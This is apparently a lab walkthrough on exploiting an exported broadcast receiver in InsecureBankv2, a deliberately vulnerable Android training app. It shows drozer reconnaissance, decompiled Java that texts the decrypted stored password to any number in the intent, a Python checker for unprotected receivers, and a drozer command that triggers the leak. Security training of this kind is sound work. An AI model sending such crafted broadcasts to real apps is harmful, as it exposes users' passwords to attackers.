Exploit Broadcast Receivers

  • Information Gathering

# Use drozer to get information about the app's broadcast receivers
dz> run app.broadcast.info -a com.android.insecurebankv2 
Attempting to run shell module
Package: com.android.insecurebankv2
  com.android.insecurebankv2.MyBroadCastReceiver
    Permission: null
  • Static Analysis of MyBroadCastReceiver

package com.android.insecurebankv2;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.telephony.SmsManager;
import android.util.Base64;

/* JADX WARN: Classes with same name are omitted:
  /home/sallam/Documents/Android AppSec/vulnApps/InsecureBankv2/build/apk/classes.dex
 */
/* loaded from: /tmp/jadx-4403557323843835393.dex */
public class MyBroadCastReceiver extends BroadcastReceiver {
    public static final String MYPREFS = "mySharedPreferences";
    String usernameBase64ByteString;

    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context, Intent intent) {
        String phn = intent.getStringExtra("phonenumber");
        String newpass = intent.getStringExtra("newpass");
        if (phn != null) {
            try {
                SharedPreferences settings = context.getSharedPreferences("mySharedPreferences", 1);
                String username = settings.getString("EncryptedUsername", null);
                byte[] usernameBase64Byte = Base64.decode(username, 0);
                this.usernameBase64ByteString = new String(usernameBase64Byte, "UTF-8");
                String password = settings.getString("superSecurePassword", null);
                CryptoClass crypt = new CryptoClass();
                String decryptedPassword = crypt.aesDeccryptedString(password);
                String textPhoneno = phn.toString();
                String textMessage = "Updated Password from: " + decryptedPassword + " to: " + newpass;
                SmsManager smsManager = SmsManager.getDefault();
                System.out.println("For the changepassword - phonenumber: " + textPhoneno + " password is: " + textMessage);
                smsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);
                return;
            } catch (Exception e) {
                e.printStackTrace();
                return;
            }
        }
        System.out.println("Phone number is null");
    }
}

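This code defines a BroadcastReceiver that reads two string extras from the incoming intent: phonenumber and newpass. When phonenumber is present, it reads the Base64-encoded username and the encrypted password from shared preferences, decrypts the password, and sends an SMS to the supplied phone number containing both the current decrypted password and the new one. It also prints the phone number and the message with System.out.println. If the phone number is not provided, it only logs that the phone number is null. Because drozer reports Permission: null for this receiver, the sender of the broadcast does not need to hold any permission.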
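A static check for the condition drozer reported above (Permission: null), as an added example that is not part of the original page or of InsecureBankv2: it lists the receivers in a decoded AndroidManifest.xml that other apps can reach without holding a permission. The manifest text, GuardedReceiver, InternalReceiver, ImplicitReceiver and the com.example names are constructed for illustration, and the function name is hypothetical.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest (not the app's real file), modelled on the drozer output above.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.android.insecurebankv2">
  <application>
    <receiver android:name=".MyBroadCastReceiver" android:exported="true">
      <intent-filter><action android:name="thBroadcast"/></intent-filter>
    </receiver>
    <receiver android:name=".GuardedReceiver" android:exported="true"
              android:permission="com.example.permission.CHANGE_PASSWORD">
      <intent-filter><action android:name="com.example.GUARDED"/></intent-filter>
    </receiver>
    <receiver android:name=".InternalReceiver" android:exported="false"/>
    <receiver android:name=".ImplicitReceiver">
      <intent-filter><action android:name="com.example.IMPLICIT"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


def unprotected_receivers(manifest_xml):
    """Return (class name, actions) for receivers any other app can reach."""
    root = ET.fromstring(manifest_xml.strip())
    package = root.get("package", "")
    findings = []
    for app in root.iter("application"):
        app_perm = app.get(ANDROID + "permission")  # inherited by components
        for rcv in app.iter("receiver"):
            actions = [a.get(ANDROID + "name") for a in rcv.iter("action")]
            exported = rcv.get(ANDROID + "exported")
            # With no explicit attribute, a receiver that declares an
            # intent-filter is exported by default when targeting below API 31.
            is_exported = exported == "true" or (exported is None and bool(actions))
            if is_exported and not (rcv.get(ANDROID + "permission") or app_perm):
                name = rcv.get(ANDROID + "name", "")
                if name.startswith("."):
                    name = package + name  # expand the shorthand class name
                findings.append((name, actions))
    return findings


if __name__ == "__main__":
    for name, actions in unprotected_receivers(SAMPLE_MANIFEST):
        print(f"{name}  Permission: null  actions={actions}")
```

The manifest inside an APK is binary XML, so feed this the decoded text (for example the AndroidManifest.xml that jadx shows under Resources).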

  • Exploit: send a message to phone number 8888888 with the new password

dz> run app.broadcast.send --action thBroadcast --extra string phonenumber 8888888 --extra string newpass Lol@88
